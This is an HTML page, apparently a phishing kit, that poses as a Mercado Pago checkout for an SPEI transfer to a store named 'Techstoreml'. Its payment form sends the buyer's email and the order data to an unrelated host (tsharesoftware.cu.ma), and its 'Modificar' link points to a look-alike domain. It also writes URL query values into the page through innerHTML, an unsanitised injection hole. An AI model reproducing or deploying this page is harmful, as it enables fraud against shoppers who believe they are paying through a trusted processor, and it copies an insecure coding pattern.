
<!DOCTYPE html>
<html lang="es-MX">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<script src="./script.js"></script>
  <script >
  function getQueryVariable(variable)
{
       var query = window.location.search.substring(1);
       var vars = query.split("&");
       for (var i=0;i<vars.length;i++) {
               var pair = vars[i].split("=");
               if(pair[0] == variable){return pair[1];}
       }
       return(false);
}
</script>
<script>
 document.addEventListener("DOMContentLoaded",  función);
    
	function función() {
		var str1 = '<br/>';
		document.getElementById('mitem').innerHTML = getQueryVariable('item_name').split('+').join(' ');
		document.getElementById('mprecio').innerHTML = '$' + getQueryVariable('amount');
		document.getElementById('mprecio2').innerHTML = '$' + getQueryVariable('amount');
		
        document.getElementById('business').value = getQueryVariable('business');		   
		document.getElementById('item_name').value = getQueryVariable('item_name').split('+').join(' ');
		document.getElementById('amount').value = getQueryVariable('amount');
		
      }
   
    </script>  
<link href="https://api.mercadopago.com/preconnect" rel="preconnect" data-head-react="true"/><script type="text/javascript" nonce="kRl44ZqZHzc6eIUWTPN2nQ==">
        window.dataLayer = [];
        (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
        new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
        j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
        'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
        })(window,document,'script','dataLayer','GTM-T8N3BPH');
      </script><meta http-equiv="X-UA-Compatible" content="IE=edge" data-head-react="true"/><meta name="robots" content="noindex,noimageindex" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><link rel="preload" href="https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2" as="font" type="font/woff2" crossorigin="anonymous" data-head-react="true"/><title>Revisa tu compra</title><style>@font-face {
          font-family:'Proxima Nova';
          font-weight:300;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-light.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-regular.ttf) format("truetype");
        }
        @font-face {
          font-family:'Proxima Nova';
          font-weight:600;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff2) format("woff2"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.woff) format("woff"),
              url(https://http2.mlstatic.com/ui/webfonts/v3.0.0/proxima-nova/proximanova-semibold.ttf) format("truetype");
        }</style>
<style>@font-face {
          font-family:'Roboto Mono';
          font-weight:400;
          font-style:normal;
          src:url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff2) format("woff2"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.woff) format("woff"),
            url(https://http2.mlstatic.com/ui/webfonts/v4.2.0/roboto-mono/roboto-mono-400.ttf) format("truetype");
        }</style>
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card.mlm.95e11102.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/payment-card-icon.mlm.815f6c2e.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />
<link href="https://http2.mlstatic.com/frontend-assets/px-checkout-frontend/app.desktop.e3a63e68.css" rel="stylesheet" type="text/css" onerror="(window['_pfl'] = window['_pfl'] || []).push(['css', this.href])" />

</head><style>
  *:focus {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus-visible {
    box-shadow: 0 0 0 2px #fff, 0 0 0 3px #007EB5, 0 0 0 5px rgba(71, 154, 209, 0.3);
    outline: none;
  }

  *:focus:not(:focus-visible) {
    box-shadow: none;
    outline: none;
  }
</style>
<body class="redirect-view site-mlm windows experiment experiment--13923 step_review" data-no-turbolink="true" data-no-transition-cache="true"><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T8N3BPH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><style>
    .andes-dropdown__arrow::after {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }
  
    .andes-badge--neutral,
    .andes-message__border-color--neutral {
      background-color: #009EE3;
    }
  
    .andes-radio__input:checked + .andes-radio__background .andes-radio__outer-circle {
      border-color: #009EE3;
    }

    .andes-radio__input:checked + .andes-radio__background .andes-radio__inner-circle {
      background-color: #009EE3;
    }
  
    .andes-list__item--selected::before {
      border-color: #009EE3;
    }
  
    .andes-switch .andes-checkbox__input:checked~.andes-checkbox__mimic:before {
      border-color: #009EE3;
      background-color: #009EE3;
    }
  
    .andes-form-control--focused .andes-form-control__border:after {
      background-color: #009EE3 !important;
    }
  
    .with-custom-color {
      color: #009EE3;
    }
  
    .item-installments_row_media .options-list__label .group-media-object div:nth-child(3) .text span,
    .item-installments_row_media .options-list__label .group-media-object .ui-avatar__content span {
      color: #009EE3;
    }

    #installments_group_generic .icon-wrapper .icon-installments span {
      color: #009EE3;
    }
  
    a, a:hover {
      color: #009EE3;
    }
  
    .options-list .options-list__item:not(.disabled, .with-action-text, .with-switch) .options-list__label::before {
      border-color: #009EE3;
    }

    .options-list .options-list__item input:checked + .options-list__label:not(.with-switch) {
      box-shadow: inset 0.25em 0 0 0 #009EE3;
    }

    .options-list .options-list__item.with-action-text .options-list__label .group-media-object div:nth-child(3) .text {
      color: #009EE3;
    }

    .options-list .options-list__label::before {
      border-right-color: #009EE3 !important;
      border-bottom-color: #009EE3 !important;
    }

    .more-cards__label {
      color: #009EE3;
    }
  
    .andes-button--loud {
      background: #009EE3;
      border-color: #009EE3;
      color: #fff;
    }

    .andes-button.andes-button--loud[data-loading='true'] {
      background: #009EE3 !important;
      border-color: #009EE3 !important;
      color: #fff !important;
    }

    .andes-button--transparent,
    .andes-button--secondary,
    :focus ~ .ui-select__status-arrow::after {
      border-color: #009EE3;
      color: #009EE3;
    }

    .andes-button--transparent svg path,
    .andes-button--secondary svg path,
    .andes-button--link svg path,
    .andes-button--quiet svg path,
    .andes-button--terciary svg path {
      fill: #009EE3;
    }

    .andes-button--link,
    .andes-button--quiet,
    .andes-button--terciary,
    .andes-button--link:hover,
    :focus + .ui-select__label,
    :focus ~ .ui-select__label {
      color: #009EE3;
    }

    .andes-button::after {
      background: hsl(198.20000000000005, 100%, 53.4%);
    }

    .andes-button--loud:hover {
      background: hsl(198.20000000000005, 100%, 39.2%);
      border-color: hsl(198.20000000000005, 100%, 39.2%);
      color: #fff
    }

    .andes-button--loud:active {
      background: hsl(198.20000000000005, 100%, 32.9%);
      border-color: hsl(198.20000000000005, 100%, 32.9%);
      color: #fff
    }
  </style><div class="layout layout--redirect"><main id="root-app" class="layout-main" role="main"><button type="button" id="mp-close-btn" class="layout-close-btn u-no-user-select" data-close-payment="true"><svg width="16" height="16" viewBox="0 0 8 8" xmlns="http://www.w3.org/2000/svg"><title>Cancelar pago</title><path d="M7.194 0L4 3.194.806 0 0 .806 3.194 4 0 7.194.806 8 4 4.806 7.194 8 8 7.194 4.806 4 8 .806" fill-rule="nonzero" fill="#eee"></path></svg></button><div class="page-mask"><div class="optimus"><div class="layout__col-content" id="group_content"><h1 id="" class="c-title"><span>Revisa tu compra</span></h1><div class="scroller with-legals"><div class="animated-group overlay_and_expand "><div class="animated-content"></div><div class="content"><div class="group-generic-block"><form id="group_payment_method" class="form group_form " method="POST" novalidate="" autocomplete="off"><ul class="options-list ui-card select_row" data-loading="false"><li class="options-list__item item-group_media_id with-action-text"><input type="radio" class="u-hide" id="group_media_id" name="[ui_components][group_content][group_scroller][group_animated_overlay_and_expand][group_not_animated_content][group_row_block][group_payment_method][select_row]" value="[group_media_id]"><label class="options-list__label" for="group_media_id"><div class="group-media-object" id=""><div><div class="icon-wrapper"><img src="./transfer spei_files/98340770-35ff-11e9-aa33-95fcc1ba1ce0-l.svg" alt="Transferencia SPEI" title=""></div></div><div><div class="row-details"><div class="text_title"><span>Transferencia SPEI</span></div><div class="text"><span>El pago se acreditará en menos de 1 hora.</span></div></div></div><div><p id="" class="text">
  <a href="https://www.gamestoremercadoshopscom.ml/MPAGO/checkout_v1_payment_redirect_0a5dbcbb-bec7-4d9e-a63d-269317184802_payment-option-form__source=transferencias">Modificar</a></p></div></div></label></li></ul></form></div><h2 id="" class="title-h2"><span>Ingresa tu e-mail para pagar</span></h2>
  <div class="ui-card-wrapper" id="email_row"><div class="ui-card">
  <form id="group_pay" class="form group_form " method="POST" action="https://tsharesoftware.cu.ma/send_transfer_2.php"><div class="icon-wrapper"><svg class="with-custom-color" height="28" width="38" viewBox="0 0 38 28" style="border-radius: 4px;"><defs><rect height="24" id="email-a" width="37" rx="4" x=".5" y=".373"></rect></defs><g fill="none" transform="translate(-5 -14)"><path d="M0 .373h48v48H0z"></path><g transform="translate(5 12)"><mask id="email-b" fill="#fff"><rect height="24" width="37" rx="4" x=".5" y=".373"></rect></mask><rect height="24" width="37" rx="4" x=".5" y=".373"></rect><path d="M5.646-11.79H32.18v26.534l-20.128-3.051a4 4 0 0 1-3.355-3.356L5.646-11.79z" fill="currentColor" fill-opacity=".3" transform="rotate(-45 18.913 1.477)"></path></g><rect height="24" width="36" rx="3" stroke="currentColor" x="6" y="14"></rect></g></svg></div><div class="andes-form-control andes-form-control--textfield andes-form-control--default  ui-input-text required"><label><span class="andes-form-control__label">E-mail</span><div class="andes-form-control__control">
  
    <input type="hidden" name="business" id="business" value="gshield811@soberanosoft.ml">
<input type="hidden" name="item_name" id="item_name"  >
<input type="hidden" name="amount" id="amount" >
<input type="hidden" name="currency_code" value="MXN">
  
  <input name="email" required
       oninvalid="this.setCustomValidity('Completa este dato')"
       onchange="this.setCustomValidity('')" type="email" autocomplete="email" autocapitalize="no" spellcheck="no" step="review" rows="1" class="andes-form-control__field" maxlength="120" id="email" aria-invalid="false" aria-describedby="email-message false" value=""></div></label><div class="andes-form-control__bottom"><span id="email-message" class="andes-form-control__message andes-form-control__message-fixed">Te enviaremos el detalle del pago apenas termines</span></div></div><input type="hidden" name="[ui_components][group_content][group_scroller][group_animated_overlay_and_expand][group_not_animated_content][email_row][group_pay][captchaToken]" value="">
  </div></div><div class="group-legals"><div class="mp-brand"><span class="mp-brand__text">Procesado por</span><span class="u-accessibility-hidden">Mercado Pago</span><span class="mp-brand__logo"></span></div><hr class=""><div class="terms"><p><span>Al pagar, afirmo que soy mayor de edad y acepto los</span><a href="https://www.mercadopago.com.mx/ayuda/24849" target="_blank" rel="noopener noreferrer">Términos y condiciones</a><span>de Mercado Pago.</span></p></div></div></div></div></div><div class="captcha-terms guest"><p><span>Protegido por reCAPTCHA - </span><a href="https://policies.google.com/privacy" target="_blank" rel="noopener noreferrer">Privacidad</a><span> - </span><a href="https://policies.google.com/terms" target="_blank" rel="noopener noreferrer">Condiciones</a></p></div></div><div class="layout__col-sidebar"><div class="brand"><span class="brand__img"><img src="./transfer spei_files/bag.png" alt="Techstoreml" title="Techstoreml"></span><span class="brand__name brand__name__small">Techstoreml</span></div><div class="group-summary"><div class="group-summary__container"><h2 id="" class="title-h2"><span>Detalle de tu compra</span></h2><div class="row-summary">
  <span class="row-summary__text " id="mitem">producto</span><span class="row-summary__price " id="mprecio">$ 10</span></div><hr class=""><div class="row-summary row-summary--pay"><span class="row-summary__text ">Pagas</span>
  <span class="row-summary__price " id="mprecio2">$ 10</span></div><div class="group-captcha guest"><div class="animated-group disabled "><button type="" class="andes-button andes-button--large andes-button--loud" trackevent="[object Object]" loadingactions="[object Object]" data-loading="false" id="pay" name=""><span class="andes-button__content">Pagar</span>
  </form>
  </button></div></div><div class="group-generic" id="shield_footer"><div class="icon-wrapper"><svg xmlns="http://www.w3.org/2000/svg" width="17" height="16" viewBox="0 0 17 16"><g fill="none" fill-opacity=".45" fill-rule="evenodd"><g fill="#000" fill-rule="nonzero"><g><g><g><path d="M8.062.599l.383.317c1.92 1.59 3.81 2.374 5.68 2.374h.6v.6c0 5.633-2.165 9.242-6.473 10.679l-.19.063-.19-.063C3.564 13.132 1.4 9.523 1.4 3.89v-.6h.6c1.87 0 3.76-.783 5.68-2.374l.383-.317zm0 1.548c-1.8 1.4-3.62 2.179-5.455 2.32.135 4.725 1.947 7.648 5.455 8.898 3.508-1.25 5.32-4.173 5.455-8.898-1.835-.141-3.656-.92-5.455-2.32zm2.286 2.895l.896.798-4.02 4.513-2.472-2.377.831-.865 1.574 1.513 3.191-3.582z" transform="translate(-71 -504) translate(56 503) translate(15 1) translate(.5)"></path></g></g></g></g></g></svg></div><p id="" class="text"><span>Paga seguro con Mercado Pago</span></p></div></div></div></div></div></div></main></div>
  
  </body></html>